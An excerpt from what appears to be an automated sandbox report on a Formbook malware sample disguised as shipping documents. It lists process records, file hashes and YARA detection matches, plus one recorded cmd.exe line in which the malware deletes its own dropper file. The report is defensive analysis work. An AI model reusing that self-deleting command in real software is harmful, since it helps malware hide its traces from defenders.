                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:08:54:04
                                      Start date:20/11/2020
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:
                                      Imagebase:0x7ff714890000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:08:54:18
                                      Start date:20/11/2020
                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                      Imagebase:0xc90000
                                      File size:78848 bytes
                                      MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      General

                                      Start time:08:54:22
                                      Start date:20/11/2020
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0xbd0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:08:54:23
                                      Start date:20/11/2020
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis
